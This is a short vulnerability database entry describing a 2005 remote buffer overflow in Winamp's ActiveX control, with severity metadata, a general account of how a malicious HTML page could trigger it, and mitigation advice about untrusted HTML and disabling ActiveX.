vendor:
Winamp
by:
SecurityFocus
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Winamp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005
Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability
Nullsoft Winamp ActiveX Control is alleged to be prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code. An attacker can exploit this issue by enticing a victim to view a malicious HTML document containing a malicious script that will overflow the buffer. This can be done by sending the malicious HTML document as an email attachment or by hosting it on a malicious website.
Mitigation:
Users should exercise caution when handling HTML documents from untrusted sources. It is also recommended that users disable ActiveX controls in their web browsers.
